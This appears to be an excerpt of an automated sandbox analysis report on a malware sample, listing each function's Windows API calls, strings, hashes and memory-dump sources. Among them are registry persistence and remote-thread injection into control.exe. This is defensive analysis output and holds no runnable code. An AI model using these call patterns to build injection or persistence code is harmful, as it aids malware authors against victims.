API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
String ID:
API String ID: 3370347312-0
Opcode ID: 9a73d89c7d5edd13e7ce462365f0661d454f3df905ee16ff7b7f63ca417e3167
Instruction ID: b7e5dee05bc16838746ffb2786879e9c74297d050ffac8f53dd0d7b47bfffee0
Opcode Fuzzy Hash: 9a73d89c7d5edd13e7ce462365f0661d454f3df905ee16ff7b7f63ca417e3167
Instruction Fuzzy Hash: 19F0C8312C0214BBDB254FA0DC89F9E3B19EF16310F104104FB02E85E1DB7195A1D759

Uniqueness

Uniqueness Score: 0.85%

Function 001D5B68, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 001D5B76
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,001D1179,00000000,?,00000000,00000000), ref: 001D5B8B
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,001D1179,00000000,?,00000000,00000000,?,?,?,001DAA9A,?), ref: 001D5B98
CloseHandle.KERNEL32(?,?,?,001D1179,00000000,?,00000000,00000000,?,?,?,001DAA9A,?), ref: 001D5BAA

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 7e291b742ff13579e1591910c68726812e52393e041f4372d38119958edb221e
Instruction ID: d1aca885e6420e67f1ac46efd3b38ef3dbe19182ab151a679780ce8bf1c45138
Opcode Fuzzy Hash: 7e291b742ff13579e1591910c68726812e52393e041f4372d38119958edb221e
Instruction Fuzzy Hash: BDF05EB010570C7FD3209F22DCC0C3BBBADFB81299B12492EF04681641DA71E8499B70

Uniqueness

Uniqueness Score: 3.53%

Function 001D30E6, Relevance: 6.0, APIs: 4, Instructions: 39stringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,?,00000000,001D4D0C,?,001C7ACF,?), ref: 001D3105
PathFindFileNameW.SHLWAPI(00000000,001E60C4,?,00000000,00000800,00001000,?,00000000,001D4D0C,?,001C7ACF,?), ref: 001D3110
_wcsupr.NTDLL ref: 001D311D
lstrlenW.KERNEL32(00000000), ref: 001D3125

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
String ID:
API String ID: 2533608484-0
Opcode ID: fc7378abba533876517997efd5b108408f357a95fa5efc5e95379a05424953d7
Instruction ID: f44263e149720f7bedf14f323fbc261c8df8fb780d4ad3ad3379c77f6e9a1ca4
Opcode Fuzzy Hash: fc7378abba533876517997efd5b108408f357a95fa5efc5e95379a05424953d7
Instruction Fuzzy Hash: 3FF097313012522F9B126B745CD9E6F272DDFB2FA0B20013AF51096200CF60CE41D662

Uniqueness

Uniqueness Score: 23.02%

Function 001CFC6F, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001C7B8F: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BC7
Part of subcall function 001C7B8F: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C7BDB
Part of subcall function 001C7B8F: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BF5
Part of subcall function 001C7B8F: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,001C67ED,Kill,?,?), ref: 001C7C1F

memcpy.NTDLL(001E5068,?,00000028,00000000,Client,?,?,?,?,?,001CBDAA,?), ref: 001CFCA1
HeapFree.KERNEL32(00000000,?,Client,?,?,?,?,?,001CBDAA,?), ref: 001CFCD2

Strings

(, xrefs: 001CFC8A
Client, xrefs: 001CFC7C

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID: ($Client
API String ID: 1301464996-90774469
Opcode ID: 051142f40d0a187132cde7963951fe5440087cab0dfb07a89341e30b08194a37
Instruction ID: 376cc0e09e5ba15ec3777445fca9f9dba1509fb61c25a38261aefcebe2e74d33
Opcode Fuzzy Hash: 051142f40d0a187132cde7963951fe5440087cab0dfb07a89341e30b08194a37
Instruction Fuzzy Hash: 19F0A472A40658BBEB21DBC0DD82F9D77BA9B24714F24001EF905699D0D7F09AC8C7A1

Uniqueness

Uniqueness Score: 1.55%

Function 001C6F49, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,?,40000000,00000000,00000001,0000012B,001C9889,000000FF,03E588A0,?,?,001DF54B,0000012B,03E588A0), ref: 001C6F65
GetLastError.KERNEL32(?,?,001DF54B,0000012B,03E588A0,?,001DE01D,00000000,?), ref: 001C6F70
WaitNamedPipeA.KERNEL32(00002710), ref: 001C6F92
WaitForSingleObject.KERNEL32(00000000,?,?,001DF54B,0000012B,03E588A0,?,001DE01D,00000000,?), ref: 001C6FA0

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: 5e19e4283283a950c831151ea3df112f923119d70c549646bd6098c40f72ba18
Instruction ID: ccd600766c8742293a88c26553f6bbdc08d596fea42f931e7936dd8efabe924f
Opcode Fuzzy Hash: 5e19e4283283a950c831151ea3df112f923119d70c549646bd6098c40f72ba18
Instruction Fuzzy Hash: 5BF06231600160ABD6305BA4AC9DF5EBA19DB653B1F214129FA19AA9F0C3314C95C790

Uniqueness

Uniqueness Score: 0.58%

Function 001D4E7A, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03E58D20), ref: 001D4E83
Sleep.KERNEL32(0000000A,?,00000000), ref: 001D4E8D
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 001D4EB5
RtlLeaveCriticalSection.NTDLL(03E58D20), ref: 001D4ED3

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 94a62e63aab3bc45303bc24cc971ae0bab15124399b1698303fc22e72f70c514
Instruction ID: 60cd4eca7c80264e8c6f8d8b0f0480aecd9b9ab6e48152345811057bc6e14448
Opcode Fuzzy Hash: 94a62e63aab3bc45303bc24cc971ae0bab15124399b1698303fc22e72f70c514
Instruction Fuzzy Hash: DFF05E702016C1AFE7208BA9EC89F0E37ADBB20740F048411F505DEAA1C734D880CB25

Uniqueness

Uniqueness Score: 0.22%

Function 001D794B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97UNIQUE

Download Yara Rule

Strings

Email, xrefs: 001D79A1, 001D79AE

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: Email
API String ID: 1279760036-642995056
Opcode ID: 4bfc1817cd9eb179d561ce0c00d8f394aef9600c64569b70188e0450f3f71151
Instruction ID: 051cd5e3dc5a55497ae9afbc7791c34d4a820dbca5055fc2923754b16b0239d6
Opcode Fuzzy Hash: 4bfc1817cd9eb179d561ce0c00d8f394aef9600c64569b70188e0450f3f71151
Instruction Fuzzy Hash: E4316DB2108245BFDB019F50DCC4C6FBFBAFB943A8F10492AF58595160D7318E55DB62

Uniqueness

Uniqueness Score: 100.00%

Function 001C52C9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001CD1BE,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 001C52E7
wsprintfA.USER32 ref: 001C5305

Strings

%02u:%02u:%02u , xrefs: 001C52FF

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: SystemTimewsprintf
String ID: %02u:%02u:%02u
API String ID: 425189169-982595855
Opcode ID: f6efa31fd4ecdc6589e457e537bd27cbd9a299eed0561dde7fb1b037053b95fb
Instruction ID: b13a498a744e77a4a3e182f7b3d07c28383f6ff0c66b49745574891700196be3
Opcode Fuzzy Hash: f6efa31fd4ecdc6589e457e537bd27cbd9a299eed0561dde7fb1b037053b95fb
Instruction Fuzzy Hash: 6D215675A00254AFCB00EBD5DC89DAF77BDFB99741B50802AF901DB651D775A881CB30

Uniqueness

Uniqueness Score: 1.69%

Function 001D314F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memoryUNIQUE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,77A4F710), ref: 001D317D
HeapFree.KERNEL32(00000000,?,?,Main,?,?,?,001D2141,00000000), ref: 001D31C2

Part of subcall function 001DE977: GetTickCount.KERNEL32 ref: 001DE98B
Part of subcall function 001DE977: wsprintfA.USER32 ref: 001DE9DC
Part of subcall function 001DE977: QueryPerformanceFrequency.KERNEL32(?), ref: 001DE9E7
Part of subcall function 001DE977: QueryPerformanceCounter.KERNEL32(?), ref: 001DE9F1
Part of subcall function 001DE977: _aulldiv.NTDLL(?,?,?,?), ref: 001DEA03
Part of subcall function 001DE977: wsprintfA.USER32 ref: 001DEA19
Part of subcall function 001DE977: wsprintfA.USER32 ref: 001DEA52
Part of subcall function 001DE977: lstrcat.KERNEL32(?,726F7426), ref: 001DEA87
Part of subcall function 001DE977: RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 001DEAA0
Part of subcall function 001DE977: GetTickCount.KERNEL32 ref: 001DEAB1

Strings

Main, xrefs: 001D31A8

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heapwsprintf$AllocateCountPerformanceQueryTick$CounterFreeFrequency_aulldivlstrcat
String ID: Main
API String ID: 324950025-521822810
Opcode ID: 1425c1f6106cd21d79723da3730aec9898f7d6a494e3787c07034fdba911f94e
Instruction ID: 33c37976b29542b9ee98eb302192d2f36bd61ffe5b3ca20e9f4ae6d543509144
Opcode Fuzzy Hash: 1425c1f6106cd21d79723da3730aec9898f7d6a494e3787c07034fdba911f94e
Instruction Fuzzy Hash: 0C011E76500148BFDB019FC4DCC5CAEBBBDFB04399B504526F605AA260D7706E849BA1

Uniqueness

Uniqueness Score: 37.75%

Function 001D637B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?), ref: 001D63BF
StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001D63D1

Strings

0x, xrefs: 001D63B9

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: 0x
API String ID: 3510742995-3225541890
Opcode ID: a66a0e99f1c63a053926cf0f1da4e27aed07da849301a3802af56a5574cefab9
Instruction ID: ad1337b95676517c77c9ffe77a3969573cfe5f412e5f644bcfbd2b8af662b08f
Opcode Fuzzy Hash: a66a0e99f1c63a053926cf0f1da4e27aed07da849301a3802af56a5574cefab9
Instruction Fuzzy Hash: 80017C76A00209BBDB11DFA8CD45AAEBBBDFB45344F004515E908E7251E7B0EA19C7A1

Uniqueness

Uniqueness Score: 0.96%

Function 0041850C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00418543

Part of subcall function 00411A14: __getptd_noexit.LIBCMT ref: 00411A17
Part of subcall function 00411A14: __amsg_exit.LIBCMT ref: 00411A24

__CallSettingFrame@12.LIBCMT ref: 0041858F

Strings

j, xrefs: 00418519

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: CallFrame@12Setting__amsg_exit__getptd__getptd_noexit
String ID: j
API String ID: 4140145597-2137352139
Opcode ID: f8df2c2272b1b3d08a78696c8c9bbc8892b91992150367a4a5c89f7a3bcfa7ec
Instruction ID: 2afaa317a6208d759eeeeb27fc913aa0eb706e7385313cc2fad371ae8fa69608
Opcode Fuzzy Hash: f8df2c2272b1b3d08a78696c8c9bbc8892b91992150367a4a5c89f7a3bcfa7ec
Instruction Fuzzy Hash: 25119170809295AFCB11DB64C4942E8BF71FF06318F28818FD4A46B193C7795992CB95

Uniqueness

Uniqueness Score: 0.84%

Function 004188A5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37UNIQUELIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416F58: __getptd.LIBCMT ref: 00416F5E
Part of subcall function 00416F58: __getptd.LIBCMT ref: 00416F6E

__getptd.LIBCMT ref: 004188B4

Part of subcall function 00411A14: __getptd_noexit.LIBCMT ref: 00411A17
Part of subcall function 00411A14: __amsg_exit.LIBCMT ref: 00411A24

__getptd.LIBCMT ref: 004188C2

Strings

csm, xrefs: 004188D0

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 6c13c86f0f2088bae48bab4dfb04183be2b4166c127d17f5c309cd986f93302f
Instruction ID: 7f47e6ee68c3c3c9950ce9986507cb03798d7cde01f2dfec0b2e01f8c8c1ba8f
Opcode Fuzzy Hash: 6c13c86f0f2088bae48bab4dfb04183be2b4166c127d17f5c309cd986f93302f
Instruction Fuzzy Hash: B5012874815205CACF249F25D4446EEB7F5AF10325F54442FE489A62A2CF3C8EC1CA5A

Uniqueness

Uniqueness Score: 100.00%

Function 001CAAF0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001DF4F8: RegCreateKeyA.ADVAPI32(80000001,03E588A0,?), ref: 001DF50D
Part of subcall function 001DF4F8: lstrlen.KERNEL32(03E588A0,00000000,00000000,00000000,?,001DE01D,00000000,?), ref: 001DF53B

RegSetValueExA.ADVAPI32(001D0A48,Client,00000000,?,00000000,00000028,00000001,001D0A48,03E58D64,00000057,?,?,001D5F5D,001E5068,001E506E,001D3B7B), ref: 001CAB1D
RegCloseKey.ADVAPI32(001D0A48,?,?,001D5F5D,001E5068,001E506E,001D3B7B,00000000,00000000,00000000,?,?,001C2DF5,03E58D64,774FC740,00000000), ref: 001CAB28

Strings

Client, xrefs: 001CAB15

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CloseCreateValuelstrlen
String ID: Client
API String ID: 1356686001-3236430179
Opcode ID: 3fa938cfed3cec9de217bb73422ccfefc025cd83234802bd63bfb64c0805b9cc
Instruction ID: 2384429f93e402e43780c44278f607fde019377d30eca6c4a15bfb52137e3f8d
Opcode Fuzzy Hash: 3fa938cfed3cec9de217bb73422ccfefc025cd83234802bd63bfb64c0805b9cc
Instruction Fuzzy Hash: 51E09232640658BFDB1157D5DD0AE9EBABEDF247A4F000121FA05BE1A0D7B09E0097A0

Uniqueness

Uniqueness Score: 1.37%

Function 001CEF9C, Relevance: 5.2, APIs: 4, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 001CEFFA
CloseHandle.KERNEL32(?,?,00000010,?,?,00000000,?,00000000), ref: 001CF045
HeapFree.KERNEL32(00000000,?,?,00000094,00000000,001CE5B2,00000000,?,001C8F42,00000000,?,001CE2AE,00000000,?,001D41B0,00000000), ref: 001CF325
GetLastError.KERNEL32(00000000,?,00000000), ref: 001CF5D4

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: 4dc0d9ab025f04c1a3321e5bd7977f600429727424b90561a4f324f3597e5538
Instruction ID: 209b25b4ecc61bbc3c6d16ee6f70d23a994a36300663bf3a69a46385c5c094d6
Opcode Fuzzy Hash: 4dc0d9ab025f04c1a3321e5bd7977f600429727424b90561a4f324f3597e5538
Instruction Fuzzy Hash: 71412771604209BEDB15AE64DC42FAF3AABAF74700F21403EFA16A21D1DF71CD539622

Uniqueness

Uniqueness Score: 0.71%

Function 001C21E8, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001D187B: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,001C221E,?,?,?,?,?), ref: 001D18D4
Part of subcall function 001D187B: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,001C221E,?,?,?,?,?), ref: 001D18F2
Part of subcall function 001D187B: RtlAllocateHeap.NTDLL(00000000,779F6985,?), ref: 001D191B
Part of subcall function 001D187B: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,001C221E,?,?,?,?,?), ref: 001D1932
Part of subcall function 001D187B: HeapFree.KERNEL32(00000000,00000000), ref: 001D1945
Part of subcall function 001D187B: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,001C221E,?,?,?,?,?), ref: 001D1954

GetLastError.KERNEL32 ref: 001C2287

Part of subcall function 001CFB1C: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?), ref: 001CFBD0
Part of subcall function 001CFB1C: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?), ref: 001CFBF4
Part of subcall function 001CFB1C: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,001C226F,?,?,?,?,?,?,?), ref: 001CFBFF

HeapFree.KERNEL32(00000000,?), ref: 001C22A3
HeapFree.KERNEL32(00000000,?), ref: 001C22B4
SetLastError.KERNEL32(00000000), ref: 001C22B7

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
String ID:
API String ID: 2451549186-0
Opcode ID: ec8acb040852ad51e723286dd1079f9cce21c3887a56ffb52234925682be58a1
Instruction ID: e54ab112b166d9153860561fd9a6752d889249d93429474bbc45864e7dca3830
Opcode Fuzzy Hash: ec8acb040852ad51e723286dd1079f9cce21c3887a56ffb52234925682be58a1
Instruction Fuzzy Hash: 2A313A32900148FFCF129F99DC84D9EBFB9FF68310B10415AF525A6161C7718AA1DF90

Uniqueness

Uniqueness Score: 1.37%

Function 001C6A11, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001D1457: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,001C6A47,?,?,?,?), ref: 001D147B
Part of subcall function 001D1457: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001D148D
Part of subcall function 001D1457: wcstombs.NTDLL ref: 001D149B
Part of subcall function 001D1457: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,001C6A47,?,?,?), ref: 001D14BF
Part of subcall function 001D1457: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001D14D4
Part of subcall function 001D1457: mbstowcs.NTDLL ref: 001D14E1
Part of subcall function 001D1457: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,001C6A47,?,?,?,?,?), ref: 001D14F3
Part of subcall function 001D1457: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,001C6A47,?,?,?,?,?), ref: 001D150D

GetLastError.KERNEL32 ref: 001C6AB0

Part of subcall function 001CFB1C: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?), ref: 001CFBD0
Part of subcall function 001CFB1C: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?), ref: 001CFBF4
Part of subcall function 001CFB1C: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,001C226F,?,?,?,?,?,?,?), ref: 001CFBFF

HeapFree.KERNEL32(00000000,?), ref: 001C6ACC
HeapFree.KERNEL32(00000000,?), ref: 001C6ADD
SetLastError.KERNEL32(00000000), ref: 001C6AE0

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
String ID:
API String ID: 3867366388-0
Opcode ID: 5e890a895d97dc026eb8e2a87b9105edce4abb5e22e4be5dbbb99f2f22516c4c
Instruction ID: 8e8f24639ea544cc82af300bdad9ae0a53b6df76b8a617978afc095b786a93c7
Opcode Fuzzy Hash: 5e890a895d97dc026eb8e2a87b9105edce4abb5e22e4be5dbbb99f2f22516c4c
Instruction Fuzzy Hash: 1C312632900218BFCF129F99CC84D9EBBB9FB68310B10815AF525A6561C3718AA1DF90

Uniqueness

Uniqueness Score: 1.37%

Function 001DE46B, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,001D5985,00000000,00000000,00000004,00000000,?,001D1D3E,00000000,?,00000008), ref: 001DE477

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

Part of subcall function 001E04EE: StrChrA.SHLWAPI(00000008,0000002F,00000000,00000000,001DE4A5,00000000,00000001,00000001,?,?,001D5985,00000000,00000000,00000004,00000000), ref: 001E04FC
Part of subcall function 001E04EE: StrChrA.SHLWAPI(00000008,0000003F,?,?,001D5985,00000000,00000000,00000004,00000000,?,001D1D3E,00000000,?,00000008,001DAA9A,?), ref: 001E0506

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001D5985,00000000,00000000,00000004,00000000,?,001D1D3E,00000000), ref: 001DE4D5
lstrcpy.KERNEL32(00000000,00000000), ref: 001DE4E5
lstrcpy.KERNEL32(00000000,00000000), ref: 001DE4F1

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 4bbd99143e00036bc86654b34119a4a0180ed56667b28758788cc5f6e14e7919
Instruction ID: 09ccffef29f466ca8bf0bfbe16fbb62ce6793f086fc966907a4f309dc22f7d3b
Opcode Fuzzy Hash: 4bbd99143e00036bc86654b34119a4a0180ed56667b28758788cc5f6e14e7919
Instruction Fuzzy Hash: A421A272504295BBCF12AF74D884A9EBFF99F16790B058055F904DF352DB70CA40D7A1

Uniqueness

Uniqueness Score: 0.39%

Function 001D08D3, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(001D0B58,77A381D0,00000000,001D0B58,/images/,?), ref: 001D08DF
lstrlen.KERNEL32(?), ref: 001D08E7

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

lstrcpy.KERNEL32(00000000,?), ref: 001D08FE
lstrcat.KERNEL32(00000000,?), ref: 001D0909

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 5a7231ff225b6ee4508c10b9515f622947e008055b4ca44fe4b97a78f53e923e
Instruction ID: 9b7a34e8c93a38aebf9172d5c1ce00742129c49dcc20819f31e2aab91f10e0f1
Opcode Fuzzy Hash: 5a7231ff225b6ee4508c10b9515f622947e008055b4ca44fe4b97a78f53e923e
Instruction Fuzzy Hash: 0AE09A33804661ABCB12ABA4AC18C8FFBADEF88320B044916F60083224CB31C910CBA1

Uniqueness

Uniqueness Score: 0.07%

Analysis Process: control.exe PID: 4404 Parent PID: 5940 control.exeUNIQUE

Executed Functions

Function 003E6338, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 644
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 003E63DD

Strings

@, xrefs: 003E680C

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: AllocateHeap
String ID: @
API String ID: 1279760036-2766056989
Opcode ID: 29d4938f74e471f91e068dc03725ff5071d19712d6ad2c2d5b0e48b8d003ddeb
Instruction ID: accd8b076739d108eeadf0aae1128df2a0a1f235ef5126f47708824c57592c9f
Opcode Fuzzy Hash: 29d4938f74e471f91e068dc03725ff5071d19712d6ad2c2d5b0e48b8d003ddeb
Instruction Fuzzy Hash: E312A630318F598FEB5AEF29D895A6673E1FB68341F41472EE44AC3291DF34E8458B81

Uniqueness

Uniqueness Score: 100.00%

Function 003DF2C8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113
nativeUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationToken.NTDLL ref: 003DF37C
NtQueryInformationToken.NTDLL ref: 003DF3C4
NtClose.NTDLL ref: 003DF3FC
NtClose.NTDLL ref: 003DF40A

Strings

0, xrefs: 003DF327

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: CloseInformationQueryToken
String ID: 0
API String ID: 3130709563-4108050209
Opcode ID: ae757ed6e7295e287773d64cdc22d22c465f75250c41974129138697f6dd71d9
Instruction ID: 5ec569598d2207a9b5d448c7975e7f448da53f998a0a6b7d76e655822594fa19
Opcode Fuzzy Hash: ae757ed6e7295e287773d64cdc22d22c465f75250c41974129138697f6dd71d9
Instruction Fuzzy Hash: 5731F931618B888FD764EF69D8D4B9AB7E2FBD8301F50492EE48EC7250DB349945CB42

Uniqueness

Uniqueness Score: 100.00%

Function 003D2348, Relevance: 7.7, APIs: 5, Instructions: 178
threadnativeinjectionUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationProcess.NTDLL ref: 003D23E7
CreateRemoteThread.KERNELBASE ref: 003D24AB
ResumeThread.KERNELBASE ref: 003D24E3
FindCloseChangeNotification.KERNELBASE ref: 003D24EE
FindCloseChangeNotification.KERNELBASE ref: 003D2516

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: ChangeCloseFindNotificationThread$CreateInformationProcessRemoteResume
String ID:
API String ID: 3814283479-0
